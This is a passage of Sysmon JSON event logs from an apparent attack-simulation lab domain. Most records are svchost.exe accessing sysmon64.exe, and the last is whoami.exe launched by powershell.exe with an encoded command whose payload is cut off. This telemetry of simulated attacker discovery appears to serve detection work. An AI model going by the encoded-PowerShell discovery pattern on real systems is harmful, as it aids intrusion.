C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5654,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5655,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5656,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5657,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5658,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5659,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5660,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.690\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001029220900}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.690","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001029220900}","TargetProcessId":"2488","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5661,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.707\r\nProcessGuid: {41C8662E-20D8-5F25-0000-00104C230900}\r\nProcessId: 3488\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand 